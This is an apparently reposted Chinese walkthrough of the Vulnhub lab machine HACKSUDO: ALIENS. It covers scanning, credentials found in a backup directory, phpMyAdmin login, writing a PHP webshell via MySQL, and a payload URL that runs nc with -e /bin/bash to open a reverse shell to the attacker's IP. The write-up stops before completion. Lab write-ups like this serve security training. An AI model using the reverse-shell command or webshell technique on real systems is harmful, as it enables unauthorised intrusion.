Vulnhub_HACKSUDO: ALIENS
Posted zhbkai
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Vulnhub_HACKSUDO: ALIENS相关的知识,希望对你有一定的参考价值。
Vulnhub下载地址https://www.vulnhub.com/entry/hacksudo-aliens,676/
0x01环境介绍
靶机ip:10.10.13.50
0x02信息收集
利用nmap进行端口漏洞的扫描,发现开放22、80、9000端口
既然有80端口,那下一步就是对80端口上的web页面进行扫描
利用dirmap扫描,发现一个页面
http://10.10.13.50/backup/
页面内容点击下载后,发现几个敏感数据
刚刚扫描出来的还有9000端口,访问了一下是phpmyadmin页面,将刚获得的敏感数据输入后,发现成功登陆
vishal/hacksudo
0x03漏洞检测
发现secure_file_priv为空值即可读可写
利用mysql写入一句话木马
0x04漏洞利用
payload:http://10.10.13.50/alien.php?cmd=nc%2010.10.13.253%20%208989%20%20-e%20/bin/bash
将/bin/bash转发到10.10.13.253的8989端口上
未完,待续……
以上是关于Vulnhub_HACKSUDO: ALIENS的主要内容,如果未能解决你的问题,请参考以下文章
Vulnhub_HACKSUDO: PROXIMACENTAURI